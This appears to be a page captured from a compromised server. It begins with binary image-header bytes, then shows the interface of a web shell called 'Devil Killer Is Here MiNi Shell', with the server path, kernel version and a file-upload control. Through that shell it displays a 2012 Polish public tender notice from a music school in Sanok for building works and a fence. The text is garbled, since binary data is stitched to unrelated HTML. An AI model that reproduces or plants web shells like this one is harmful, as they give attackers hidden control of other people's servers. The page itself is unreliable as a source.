JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120726/271280-N-2012.html

<p class="kh_header"><b>Sanok: Termomodernizacja obiektu PSM z ogrodzeniem i wyposażeniem</b><br>
<b>Numer ogłoszenia: 271280 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Szkoła Muzyczna  I i II st. im. Wandy Kossakowej w Sanoku , ul. Podgórze 25, 38-500 Sanok, woj. podkarpackie, tel. 013 46 45 315, faks 013 46 45 315.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://sanokpsm.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa szkoła muzyczna I i II st..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektu PSM z ogrodzeniem i wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych 
z termomodernizacją głównego budynku szkoły, a w szczególności:                                                                           
1. Dostawa i wymiana stolarki okiennej z obróbką okien i szpalet, dostawa (montaż) i wymiana  parapetów wewnętrznych. 
Parametry i wytyczne:
44 szt. - okna PCV 5-komorowe uchylno - rozwierane z mikro wentylacją 
i nawiewnikami, 
10 szt. - okna PCV 5-komorowe uchylno - rozwierane z mikro wentylacją 
i nawiewnikami dźwiękoszczelne o wsp. tłumienia hałasu Rw=27 dB 
1 szt. - okno PCV 5-komorowe dźwiękoszczelne o wsp. tłumienia hałasu Rw=27 dB, dwukwaterowe przedzielone pionowym słupkiem z szybami matowymi od wewnątrz w kolorze grafitowym (do ustalenia z inwestorem) zamykane na klucz (bez klamkowy) z mikrowentylacją i nawiewnikami: 
Parapety wewnętrzne typu aglomarmur powinny być wymiarowo dostosowane do szerokości i głębokości szpalety wewnętrznej, o grubości niemniejszej niż 3 cm. Kolorystykę należy uzgodnić z Zamawiającym.
2. Dostawa i wymiana stolarki drzwiowej oraz modernizacja wejścia głównego:
                       
1szt. drzwi zewnętrzne z profili aluminiowych EI 30  p. paniczne, wyposażone 
w podwójny system antywłamaniowy szklone matową bezpieczną szybą, 
1 szt. podwójne drzwi wewnętrzne akustyczne o izolacyjności Rw=37 dB
z progiem stałym, 

3. Dostawa i wymiana parkietu w salach dydaktycznych -  135 m2

Obejmuje rozbiórkę i ułożenie parkietu dębowego  I gatunku w odmianie dąb wędzony. Roboty budowlane obejmują  wszystkie prace przygotowawcze oraz wykończeniowe, typu wykonanie wylewki wg potrzeb, wykonanie elementów pionowych sceny, w tym stopnic i podstopnic, cokołu, prace obejmujące czyszczenie oraz lakierowanie podłogi lakierem półmatowym o właściwościach zgodnych z normami dla pomieszczeń użytku publicznego z natężonym ruchem.

4. Dostawa i wykonanie cokołu wokół budynku z płytek klinkierowych typu Cerrad rott lub burgund:

Robota budowlana obejmuje obłożenie elementów pionowych, a także elementów poziomych, gdzie należy wykonać prace przygotowawcze typu gruntowanie, wykonanie wylewki wyrównującej z jednostronnym spadkiem, spoinowanie oraz zabezpieczenie całości odpowiednim impregnatem 

5. Dostawa i wymiana ogrodzenia terenu PSM terenu PSM od strony ul. Podgórze i od strony północno - wschodniej:

Roboty budowlane  obejmują zarówno prace przygotowawcze, jak dostawę 
i montaż nowego ogrodzenia wraz z uporządkowaniem terenu przy ogrodzeniu.
Przed przystąpieniem do robót właściwych należy rozebrać i usunąć istniejące ogrodzenie, przygotować teren do robót oraz złożyć elementy metalowe we wskazane miejsce na posesji budynku.          
Opis projektowanego ogrodzenia                                                                                      
 Projektuje się wykonanie ogrodzenia:                                                                         
Odcinek od ulicy Podgórze 
- konstrukcja ogrodzenia obejmuje 
a) słupki wykonane z cegły klinkierowej pełnej w kolorze ustalonym 
z Zamawiającym .  
Słupki murowane z cegły klinkierowej pełnej o wymiarach 38 x 38 [cm], 
o wysokości ok. 1,5 m (zgodnie z rysunkiem) nakryte czterospadowym klinkierowym daszkiem, osadzone na stopie fundamentowej o głębokości nie mniejszej niż 1,25 m  z betonu klasy B15, z uzbrojeniem stalowym podłużnym czteroprętowym, każdy o przekroju nie mniejszym niż fi 10.  Słupki ustawiane na odcinku od ulicy Podgórze  - czternaście przęseł w rozstawie osiowym 3,70 m, Stopy fundamentowe muszą sięgać poniżej poziomu strefy przemarzania gruntu, czyli na głębokość 125 cm.
b) rygle (cokoły) ogrodzeniowe wykonane z cegły klinkierowej pełnej w kolorze uzgodnionym z Zamawiającym trzy warstwy, wysokości ok. 25 cm + 12 cm, przy czym trzecia warstwa wykonana kształtką typu N-7.  Fundamenty cokołu  0,25x1,20 m, beton B15 ponad grunt ok. 12 cm uzbrojone w izolacje poziomą przeciwwilgociową. 
Konstrukcja rygli: 2 warstwy cegły klinkierowej pełnej w kolorze uzgodnionym 
z Zamawiającym, spoina 1 cm, 1 warstwa kształtki ogrodzeniowe N-7,
c) przęsła - wypełnienie stalowe 
Wypełnienie przęseł pomiędzy słupkami - przęsło składa się ze stalowych profili pionowych 20x20 mm skręcanych na odcinku ? wysokości o 1 i ? obrotu ocynkowanych malowanych farbą antykorozyjną w kolorze czarnym z przecierkami miedzianymi, odległość między prętami 11 cm. W każdym elemencie przęsła powinien znajdować się wizerunek loga szkoły wykonany z profili metalowych jw.                                                                                                       
Zwieńczenie przęsła stanowią obustronnie montowane płaskowniki 20x5mm (2+2) - zwieńczenie przęsła górą w kształcie fali wg. rysunku. 
d) elementy dodatkowe ogrodzenia 
2 szt. -  brama przesuwna wjazdowa - szerokość ok. 6,0 m, o szerokości i rozstawie prętów jak przęsła z wizerunkiem logo szkoły uzbrojona w mechanizm bezprzewodowego sterowania automatycznego. Osprzęt bramy wg. technologii wybranego producenta typu Horman, Wiśniowski (6 pilotów na każdą bramę). Zakres prac obejmuje także doprowadzenie zasilania elektrycznego do powyższych elementów z budynku szkoły lub oświetlenia zewnętrznego.  
2 szt. furtka przesuwna o szerokości ok. 1,2 m rozstawie prętów jak przęsła z wizerunkiem logo szkoły uzbrojona w mechanizm bezprzewodowego sterowania automatycznego. Osprzęt bramy wg. technologii wybranego producenta typu Horman, Wiśniowski (6 pilotów na każdą furtkę). Zakres prac obejmuje doprowadzenie zasilania elektrycznego do powyższych elementów z budynku szkoły lub oświetlenia zewnętrznego.
Zamawiający wymaga wykonania robót budowlanych  związanych  z pracami końcowymi obejmującymi wyrównanie, uporządkowanie terenu między ogrodzeniem a budynkiem.

Odcinek od strony północno-wschodniej (od sąsiada) słupki wykonane z cegły klinkierowej pełnej.  

a) słupki murowane z cegły klinkierowej pełnej w kolorze ustalonym z Zamawiającym o wymiarach 38 x 38 [cm], o wysokości ok. 1,5 m (zgodnie z rysunkiem) nakryte czterospadowym klinkierowym daszkiem, osadzone na stopie fundamentowej o głębokości nie mniejszej niż 1,25 m  z betonu klasy B15, z uzbrojeniem stalowym podłużnym czteroprętowym, każdy o przekroju nie mniejszym niż fi 10. słupki murowane  w rozstawie osiowym 6,00 m  (w środku słupki stalowe co 3,00m)  Jako słupki zastosowano elementy rurowe - systemowe 80x40 mm z kapturkami w kształcie kuli o średnicy ok.  100 mm. Stopy fundamentowe muszą sięgać poniżej poziomu strefy przemarzania gruntu, czyli na głębokość 125 cm.
b) rygle (cokoły) ogrodzeniowe wykonane z cegły klinkierowej pełnej w kolorze uzgodnionym z Zamawiającym  trzy warstwy, lub dwie tak aby wysokości rygli od strony ul. Podgórze i północno-wschodniej licowały ze sobą) o wysokości ok. 25 cm + 12 cm, przy czym trzecia warstwa wykonana kształtką typu N-7.  Fundamenty cokołu  0,25x1,20 m, beton B15 ponad grunt ok. 10 cm uzbrojone w izolacje poziomą przeciwwilgociową. 
Konstrukcja rygli: 2 warstwy cegły klinkierowej pełnej w kolorze uzgodnionym z Zamawiającym, spoina 1 cm, 1 warstwa kształtki ogrodzeniowe N-7,
c) przęsła - wypełnienie stalowe 
Wypełnienie przęseł pomiędzy słupkami - przęsło składa się ze stalowych profili pionowych 20x20 mm skręcanych na odcinku ? wysokości o 1 i ? obrotu ocynkowanych malowanych farbą antykorozyjną w kolorze czarnym z przecierkami miedzianymi, odległość między prętami 11 cm. Zwieńczenie przęsła stanowią obustronnie montowane płaskowniki 20x5mm (2+2) - zwieńczenie przęsła górą w kształcie fali wg. rysunku.  

Zamawiający wymaga wykonania robót budowlanych  związanych  z pracami końcowymi obejmującymi wyrównanie, uporządkowanie terenu w otoczeniu ogrodzenia.

Poniższe dotyczy całości ogrodzenia, tj. odcinek od ulicy Podgórze i odcinek od ulicy północno-wschodniej.

Wykop pod fundament należy wyłożyć folią budowlaną, aby zapobiec    ucieczce wody zarobowej z zaprawy do gruntu.

Zamawiający  wymaga, aby wykonywanie robót  przebiegało zgodnie z opracowaną dokumentacją .
  
Przedmiot zamówienia obejmuje: wykonanie prac rozbiórkowych, robót zbrojarskich, betonowych, wykonanie tynków i okładzin,  robót   montażowych - instalowanie dziwi, okien, parapetów, kładzenie parkietu, wznoszenie ogrodzeń. Szczegóły zakresu robót opisane są w załączonych projektach, przedmiarach robót oraz w specyfikacji technicznej wykonania 
i odbioru robót. 
Zamawiający wymaga zabezpieczenia folią itp., wszystkich elementów nie podlegających remontowi. 

Ponadto Zamawiający wymaga  uzgodnienia kolorystyki jak również uzyskania akceptacji (pisemnej) na elementy podlegające wbudowaniu ( parkiet, okładziny z płytek, elementy klinkierowe ogrodzenia, elementy metaloplastyczne ogrodzenia, itp.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.11.00.00-1, 45.26.23.00-4, 45.26.23.10-7, 45.42.11.00-5, 45.43.20.00-4, 45.43.10.00-7, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium 
w wysokości 5 431,50   zł do dnia 10 sierpnia  2012 roku, do godz. 12.00.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz 
z 2010 r. Nr 96, poz. 620).
Uwaga:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a prawa zamówień publicznych, tj. jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw.
2) w art. 46 ust. 5 prawa zamówień publicznych, tj.: jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. Wadium w innej formie niż pieniądz należy złożyć łącznie z ofertą, może być w oddzielnej kopercie. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
3. Wadium wnoszone w pieniądzu należy wpłacić na konto Narodowy Bank Polski
76 1010 1528 0901 6013 9800 0000
Terminem wniesienia wadium w formie pieniężnej jest termin wpływu wadium na konto Zamawiającego.
4. Brak wadium (wpłaconego przez Wykonawcę) w wyznaczonym terminie na koncie Zamawiającego spowoduje wykluczenie tego Wykonawcy.
5. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie nie złożył dokumentów, oświadczeń lub pełnomocnictw chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz 
z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) nie wniósł zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania tego warunku odbędzie się na podstawie oświadczenie - Zał. Nr 3</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi wykazać się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednej roboty ogólnobudowlanej  na jednym budynku w ramach jednego zlecenia, której wartość wynosiła min. 100 000,00 zł brutto (zbrojenie, roboty murarskie, instalowanie drzwi i okien, kładzenie parkietu wznoszenie ogrodzeń). Ocena spełnienia tego warunku odbędzie się na podstawie oświadczenia - Zał. Nr 3, wykazu robót budowlanych - Zał. Nr 4 wraz z dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone oraz zobowiązania innych podmiotów - Zał. Nr 5 (jeżeli dotyczy)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku odbędzie się na podstawie oświadczenia - Zał. Nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku odbędzie się na podstawie oświadczenia - Zał. Nr 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku odbędzie się na podstawie oświadczenia - Zał. Nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,

upoważnienie do podpisania oferty, o ile nie wynika ono z dokumentów dołączonych do oferty,

zobowiązanie innych podmiotów - Zał. Nr 5 ( jeśli dotyczy),</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>8) Zmiana umowy:
a) Zmiana umowy może nastąpić, po ewentualnej zmianie przepisu dotyczącego wysokości stawki podatku od towarów i usług VAT, co skutkować będzie zmianą kwoty netto 
i naliczonych kwot podatku VAT, do robót wykonywanych po dniu w którym przepisy zaczną obowiązywać. Cena ryczałtowa pozostanie bez zmian.
b) Zamawiający w uzgodnieniu z Wykonawcą może w każdej chwili zarządzić wprowadzenie robót zamiennych o ekwiwalentnej wartości do wykonywanego zakresu umowy, w przypadku zaistnienia okoliczności wynikających z technologii lub funkcjonalności przedmiotu zamówienia. W przypadku, gdyby strony ustaliły wykonanie robót zamiennych w ramach niniejszej umowy, wtedy wartość każdej takiej modyfikacji zostanie poddana osobnej  wycenie w oparciu o analizę cen przedstawioną przez Wykonawcę sprawdzonych przez inspektora nadzoru i zatwierdzonych przez Zamawiającego. Roboty zamienne będą zgłaszane przed ich wprowadzeniem.
c) Zamawiający dopuszcza zmianę osoby kierownika budowy
d) Zamawiający dopuszcza zmianę terminu wykonania zamówienia w wyniku wystąpienia robót dodatkowych.
e) Zmiana umowy może nastąpić w okoliczności zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy
zachowaniu należytej staranności,
- której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://sanokpsm.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Szkoła Muzyczna I i II st. im. Wandy Kossakowej w Sanoku
